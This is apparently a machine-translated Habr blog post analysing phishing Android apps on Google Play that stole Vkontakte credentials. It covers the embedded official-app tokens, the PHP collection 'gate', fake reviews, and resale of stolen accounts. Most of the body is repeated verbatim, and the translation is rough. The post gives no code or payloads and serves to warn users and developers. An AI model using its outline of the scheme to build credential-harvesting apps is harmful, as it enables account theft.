Phishing applications for Vkontakte on Google Play
A couple of months ago, Kaspesky's laboratory published an article about phishing VC accounts on Google Play, but did not tell how it was implemented and why such applications linger in the market. Their article said that about 1 million users could become victims of phishing.
I reversed about the same applications in the spring. I then argued with a friend that there are malicious applications in the market. Malicious applications could not be found; there were only fakes for Vkontakte. But maybe just looking for a little. But now they could not be found in the market, most likely they were deleted after the discovery of Kaspersky Lab.
But at the time of my search for these applications was quite a lot. The main reason for their longevity was that they use tokens from the official Vkontakte application, in which they are stored in the open form. Vkontakte cannot revoke / change its tokens, because not all users want or can update the application. For example, someone just does not want, someone has no place on the phone. And if you change the token, the old version of the application would stop working.
I managed to find tokens in a couple of minutes, which already indicates that they are in the code in plain sight.
So, as with the decompilation of android applications, the code is restored almost to variable names. Here we are looking for all the Activity and classes that have something in the names in the spirit of VkLogin, AuthorizationVk. They will have variables for entering login and password, as well as links to which requests are being sent. At this point, it becomes immediately clear whether the application is malicious.
In the process of reversing, I came across interesting solutions, for example, a very strange try-catch construct, in which the authorization first tries to pass with the tokens of the author's application, and in catch tokens from the official application. The motives for such a strange decision are still not clear to me. And most immediately use the data of the official application.
')
One of the developers decided to reassure users and made almost a copy of the authorization through Oauth2
But how it should look like
All applications were not obfuscated and the link to the gate (php script that processes the data sent to it, for example, checks for valid and writes to the database) was also in open form. The same applications flashed from the same developer, only the icons differed. Applications immediately after publication are displayed in the top with the help of purchased accounts, from which reviews are written, in which messages about account theft are lost in the process. Applications are not just a form with authorization fields. These are real, and well-functioning applications that perform all the declared functions, even without advertising. Some of them after the publication continue to be supported by the developer. All for the convenience of the user, but with such a small malicious feature. Then the collected accounts will go to the market. Such markets have become automatic. In Google, on the request “to buy accounts for VC” there will be a whole list.
The price of one account depends on the “steepness” - the number of friends, subscribers, photos, etc. And varies on average from 2 rubles to 2000 rubles. Such accounts are taken for spam by personal messages, promotion of groups / applications, publication of messages in public, etc.
So, before installing the application, you should carefully review the reviews and be wary of applications that require your username and password. And for developers, if the request for a login and password is the only option, this solution should be explained.
I reversed about the same applications in the spring. I then argued with a friend that there are malicious applications in the market. Malicious applications could not be found; there were only fakes for Vkontakte. But maybe just looking for a little. But now they could not be found in the market, most likely they were deleted after the discovery of Kaspersky Lab.
But at the time of my search for these applications was quite a lot. The main reason for their longevity was that they use tokens from the official Vkontakte application, in which they are stored in the open form. Vkontakte cannot revoke / change its tokens, because not all users want or can update the application. For example, someone just does not want, someone has no place on the phone. And if you change the token, the old version of the application would stop working.
I managed to find tokens in a couple of minutes, which already indicates that they are in the code in plain sight.
So, as with the decompilation of android applications, the code is restored almost to variable names. Here we are looking for all the Activity and classes that have something in the names in the spirit of VkLogin, AuthorizationVk. They will have variables for entering login and password, as well as links to which requests are being sent. At this point, it becomes immediately clear whether the application is malicious.
In the process of reversing, I came across interesting solutions, for example, a very strange try-catch construct, in which the authorization first tries to pass with the tokens of the author's application, and in catch tokens from the official application. The motives for such a strange decision are still not clear to me. And most immediately use the data of the official application.
')
One of the developers decided to reassure users and made almost a copy of the authorization through Oauth2
But how it should look like
All applications were not obfuscated and the link to the gate (php script that processes the data sent to it, for example, checks for valid and writes to the database) was also in open form. The same applications flashed from the same developer, only the icons differed. Applications immediately after publication are displayed in the top with the help of purchased accounts, from which reviews are written, in which messages about account theft are lost in the process. Applications are not just a form with authorization fields. These are real, and well-functioning applications that perform all the declared functions, even without advertising. Some of them after the publication continue to be supported by the developer. All for the convenience of the user, but with such a small malicious feature. Then the collected accounts will go to the market. Such markets have become automatic. In Google, on the request “to buy accounts for VC” there will be a whole list.
The price of one account depends on the “steepness” - the number of friends, subscribers, photos, etc. And varies on average from 2 rubles to 2000 rubles. Such accounts are taken for spam by personal messages, promotion of groups / applications, publication of messages in public, etc.
So, before installing the application, you should carefully review the reviews and be wary of applications that require your username and password. And for developers, if the request for a login and password is the only option, this solution should be explained.
Source: https://habr.com/ru/post/272783/
All Articles